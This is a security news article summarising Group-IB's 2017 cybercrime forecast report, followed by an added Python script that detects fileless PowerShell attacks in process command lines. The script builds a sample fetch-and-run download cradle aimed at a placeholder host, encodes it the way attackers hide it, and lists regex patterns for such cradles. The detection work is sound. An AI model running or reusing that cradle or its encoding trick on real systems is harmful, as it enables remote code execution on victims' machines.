Results and forecasts: Group-IB presented Hi-Tech Crime Trends 2017 report

Pierluigi Paganini October 12, 2017

Hi-Tech Crime Trends 2017 – Banks, power stations and cryptocurrency exchanges are forecast to be the most likely targets for hacking in the near future

Group-IB, one of the global leaders in preventing and investigating high-tech crimes and online fraud, presented its Hi-Tech Crime Trends 2017 report at CyberCrimeCon,

Group-IB presented Hi-Tech Crime Trends 2017 report

In the next year, the main source of losses for banks from cyber-attacks will not be theft of money, but destruction of their IT infrastructure during the final stages of a targeted attack. Banks used to be attacked by cybercriminals. Today, state-backed hackers are also doing this much more frequently. By destroying IT infrastructure, cybercriminals will attempt to cover their tracks during thefts, while state-sponsored hackers will aim to maximize the damage to banks and halt banking operations. In both cases, the damage done to banks may be even greater than the amount of funds stolen, due to service interruptions and the resulting reputational and regulatory impact.

  • One possible sabotage scenario is trading on exchanges on behalf of the victim bank in order to influence exchange rates and cause losses. This can lead to snowball-style flash crashes as HFT algorithms respond to the fluctuations in exchange rates.
  • Out of 22 new malicious programs used to steal funds, 20 (91%) were created and are controlled by Russian-speaking hackers.
  • Phishing against banks and payment systems is automated and conducted in real time, which allows cybercriminals to bypass SMS confirmations for debiting money. On average, 10-15% of visitors to financial phishing websites enter their data.

Hackers are increasingly focusing on the crypto industry (ICOs, wallets, exchanges, funds), which has been accumulating ever larger capitalisations and funds. In technical terms, attacks against service providers in this sector are no more difficult than attacks against banks; however, the information security measures in place at blockchain companies, and their maturity, are significantly lower. A further motivation for criminal attackers is that blockchain technologies are more anonymous and unregulated, which considerably reduces the risk of being caught when withdrawing money.

  • The total damage caused by targeted hacker attacks on the cryptocurrency industry amounts to more than $168 million, and the income from attacks on cryptocurrency exchanges varies from $1.5 million (Bitcurex) to $72 million (Bitfinex), while a successful attack on a bank brings criminals only about $1.5 million on average.
  • Attacks on cryptocurrency exchanges are conducted in the same way as targeted attacks on banks, with similar or sometimes identical tools and tactics. For example, cybercriminals use fake IDs to obtain a victim's SIM card, recover passwords and gain control over accounts at cryptocurrency services.
  • The fact that attackers are “retargeting” popular banking Trojans such as TrickBot, Vawtrak, Qadars, Tinba and Marcher to collect the logins and passwords of cryptocurrency users suggests that they have found a new niche and might focus outside the traditional banking sector in the near future.
  • Targeted attacks on cryptocurrency exchanges will be carried out not only by financially motivated hackers but by state-sponsored attackers as well.

Hackers will now successfully attack more industrial facilities, as they have learnt how to work with the “logic” of critical infrastructure. These facilities use complex and unique IT systems: even after gaining access to them, an attacker needs specific knowledge of the principles of their operation to conduct an attack. Over the past year, we have observed that hackers' competence has increased along with their capacity to impact critical infrastructure. Therefore, we now forecast new large-scale incidents targeting industrial facilities and related core infrastructure.

The BlackEnergy group continues to attack financial and energy companies. The group uses new tools that allow remote terminal units (RTUs), which are responsible for the physical opening/closing of power grids, to be remotely controlled. Test attacks on power generating companies in the UK and Ireland were tracked in the summer of 2017.


The growth in the number of attacks and in the totals stolen is a significant indicator of hackers' capabilities, which drive changes in their tactics and targets. Most attackers follow the money, and if they find more efficient and safer ways to earn it, they start investing in them, creating new tools, services and attack schemes.

In Russia, the amount of losses caused by theft from legal entities is still in decline, but losses caused by Android banking Trojans are still increasing. The number of targeted attacks on banks and payment systems is on the rise, but hackers have earned the majority of their profits outside Russia, as we predicted last year.

After phishing attacks on bank clients and payment systems were fully automated, the amount of loss from this activity in Russia became very significant. Every day, phishing attacks target many more users than banking Trojans do, but the net loss is still smaller. However, due to the simplicity of this scheme, an increasing number of criminals are starting to use it.

Development of Hacking Tools

  • Fileless malware that uses malicious scripts to launch an attack is a new and currently the primary attack method. To slip under the radar, hackers use fileless software that exists only in RAM until the system is rebooted. At the same time, malicious PowerShell, VBS and PHP scripts help them to ensure persistence on the system and to automate some stages of their attacks.
  • NotPetya has demonstrated that creating a template can be enough to gain control over a corporate network. In the future, we should expect many scripted cyber-attacks, as well as ready-made simple tools that can gain control over corporate domains automatically. If such tools are made publicly available or are sold among hackers, this can lead to an avalanche-like growth of attacks on the corporate sector. We primarily expect more incidents involving ransomware, theft of confidential information and extortion for non-disclosure, money theft, and public exposure by non-financially motivated hackers.
  • We expect malware developers to continue actively publishing the code of their programs online. In addition, leaks published by The Shadow Brokers and similar groups will be used immediately for malware creation and improvement. This will give a powerful boost to the development of the cybercrime industry.
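
As an added illustration of the fileless-script point above (this is not Group-IB's code and is not part of the report), the following Python scores process command lines, in the shape of the CommandLine field of a process-creation log, for the indicators that commonly accompany script-based, memory-only PowerShell stages: hidden windows, encoded commands, download cradles and Invoke-Expression. The sample lines, the indicator list, the weights and the alerting threshold are all assumptions made for this demonstration.

```python
"""Score PowerShell command lines for indicators of script-based, memory-only
payloads. Added illustration only: not Group-IB's code and not from the
report. Indicator names, weights, threshold and sample lines are assumptions
made for this demonstration."""
import base64
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so the
# encoded-command switch may appear as -e, -ec, -enc or -EncodedCommand.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Heuristic indicators that commonly accompany fileless PowerShell stages.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-nop\b|-noprofile\b", re.IGNORECASE),
    "bypass_policy": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.IGNORECASE),
    "encoded_command": ENCODED_ARG,
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.IGNORECASE),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.IGNORECASE),
    "base64_decode": re.compile(r"frombase64string", re.IGNORECASE),
}
# Assumed weights: behaviours that fetch or evaluate code in memory weigh most.
WEIGHTS = {"hidden_window": 2, "no_profile": 1, "bypass_policy": 1, "encoded_command": 2,
           "invoke_expression": 3, "download_cradle": 3, "base64_decode": 2}
THRESHOLD = 5  # assumed alerting threshold

# Constructed sample: a download cradle pointing at a non-routable host, wrapped
# the way PowerShell expects for -EncodedCommand (Base64 of UTF-16LE text).
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines: two benign admin invocations, two hostile.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -enc " + ENCODED_CRADLE,
    'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"',
    'powershell.exe -Command "IEX ([System.Text.Encoding]::UTF8.GetString('
    "[Convert]::FromBase64String('Y29uc3RydWN0ZWQ=')))\"",
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind an -EncodedCommand argument, or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # malformed Base64 or non-UTF-16 bytes
        return None


def analyze(cmdline):
    """Score one command line; encoded payloads are decoded before matching."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    score = sum(WEIGHTS[name] for name in hits)
    return {"score": score, "indicators": hits, "decoded": decoded,
            "suspicious": score >= THRESHOLD}


def triage(cmdlines):
    """Return only the lines that cross the threshold, highest score first."""
    flagged = [(line, analyze(line)) for line in cmdlines]
    flagged = [(line, r) for line, r in flagged if r["suspicious"]]
    return sorted(flagged, key=lambda item: item[1]["score"], reverse=True)


if __name__ == "__main__":
    for line, result in triage(SAMPLE_COMMAND_LINES):
        print(result["score"], result["indicators"])
        print("   ", line[:80])
        if result["decoded"]:
            print("    decoded:", result["decoded"])
```

The defensive point is the decode step: an -EncodedCommand argument carries Base64 of UTF-16LE text, so the cradle that fetches the in-memory stage is invisible to plain string matching until it is decoded. The two benign lines score below the threshold even though one of them uses -NoProfile and -ExecutionPolicy Bypass, which is why single switches carry low weight here. In production this logic would sit over PowerShell script block logging or a process-creation feed rather than a static list, and the weights would be tuned against the environment's own baseline.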

The full version of Hi-Tech Crime Trends 2017 is available on the Group-IB website.

About Group-IB

Group-IB is one of the global leaders in preventing and investigating high-tech crimes and online fraud, and the first Russian supplier of threat intelligence solutions to be included in Gartner, Forrester and IDC reports. In order to prevent cyberattacks, Group-IB supplies solutions from its line of early threat detection products. It is a permanent member of the World Economic Forum. Group-IB has the largest criminalistics laboratory in Eastern Europe and a computer emergency response team (CERT-GIB). In 2017, the company became the leader in the Russia Threat Intelligence Security Services Market Analysis conducted by IDC. For more details visit:


Pierluigi Paganini

(Security Affairs – cybercrime, Crime Trends 2017 report)
